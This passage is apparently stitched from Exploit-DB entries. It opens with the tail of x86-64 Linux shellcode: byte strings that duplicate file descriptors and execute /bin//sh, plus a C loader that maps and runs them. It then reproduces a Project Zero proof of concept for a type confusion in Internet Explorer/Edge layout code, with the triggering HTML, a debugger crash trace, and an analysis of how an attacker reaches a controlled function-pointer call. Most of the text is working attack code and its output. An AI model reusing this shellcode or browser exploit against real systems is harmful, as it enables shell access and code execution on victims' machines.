/* 001B */ "\x0f\x05"                                  /* syscall */
/* 001D */ "\x31\xf6"                                  /* xor esi, esi */
/* 001F */ "\xb0\x32"                                  /* mov al, 0x32 */
/* 0021 */ "\x0f\x05"                                  /* syscall */
/* 0023 */ "\xb0\x2b"                                  /* mov al, 0x2b */
/* 0025 */ "\x0f\x05"                                  /* syscall */
/* 0027 */ "\x97"                                      /* xchg edi, eax */
/* 0028 */ "\x96"                                      /* xchg esi, eax */
/* 0029 */ "\xb0\x21"                                  /* mov al, 0x21 */
/* 002B */ "\x0f\x05"                                  /* syscall */
/* 002D */ "\x83\xee\x01"                              /* sub esi, 0x1 */
/* 0030 */ "\x79\xf7"                                  /* jns 0x29 */
/* 0032 */ "\x31\xf6"                                  /* xor esi, esi */
/* 0034 */ "\x50"                                      /* push rax */
/* 0035 */ "\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  /* mov rcx, 0x68732f2f6e69622f */
/* 003F */ "\x51"                                      /* push rcx */
/* 0040 */ "\x54"                                      /* push rsp */
/* 0041 */ "\x5f"                                      /* pop rdi */
/* 0042 */ "\x99"                                      /* cdq */
/* 0043 */ "\xb0\x3b"                                  /* mov al, 0x3b */
/* 0045 */ "\x0f\x05"                                  /* syscall */
};

void xcode(char *s, int len) {
  uint8_t *p;

  p=(uint8_t*)mmap (0, len, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
  memcpy(p, s, len);
  // execute
  ((void(*)())p)();
  munmap ((void*)p, len);
}

int main(int argc, char *argv[]) {
  uint8_t *sc=(uint8_t*)mmap (0, sizeof(BS), PROT_EXEC | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);

  if (sc != NULL) {
    memcpy (sc, BS, sizeof(BS));
    xcode (EGG64, EGG64_SIZE);
    munmap((void*)sc, sizeof(BS));
  }
  return 0;
}

Source: https://www.exploit-db.com/exploits/41439/
  23. <!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011

PoC:
-->

<!-- saved from url=(0014)about:internet -->
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
function boom() {
  document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  th1.align = "right";
}
</script>
<body onload="setInterval(boom,100)">
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="5" width=0></th>
<th class="class2" width=0><div class="class2"></div></th>

<!--
Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly.

The PoC crashes in MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement when reading from address 0000007800000070

(5fc.8a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????

With the following call stack:

Child-SP          RetAddr           Call Site
00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34

And the following register values:

rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
 r8=0000007916490ec0  r9=000000710e75b980 r10=00000079164a8f30
r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
r14=000000791648ec60 r15=0000007911ec9f50

Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.

Let's take a look at the code around the rip of the crash.

00007ffe`8f330a51 488bcd          mov     rcx,rbp
00007ffe`8f330a54 e8873c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a59 48833800        cmp     qword ptr [rax],0 ds:00000078`00000070=????????????????
00007ffe`8f330a5d 743d            je      MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
00007ffe`8f330a5f 488bcd          mov     rcx,rbp
00007ffe`8f330a62 e8793c64ff      call    MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a67 488b30          mov     rsi,qword ptr [rax]
00007ffe`8f330a6a 488b06          mov     rax,qword ptr [rsi]
00007ffe`8f330a6d 488bb848030000  mov     rdi,qword ptr [rax+348h]
00007ffe`8f330a74 488bcf          mov     rcx,rdi
00007ffe`8f330a77 ff155b95d700    call    qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
00007ffe`8f330a7d 488bce          mov     rcx,rsi
00007ffe`8f330a80 ffd7            call    rdi

On 00007ffe`8f330a51 rcx is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations).

On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory. However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the first th element. Let's see what happens if an attacker can point rax to the memory he/she controls.

Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
-->

Source: https://www.exploit-db.com/exploits/41454/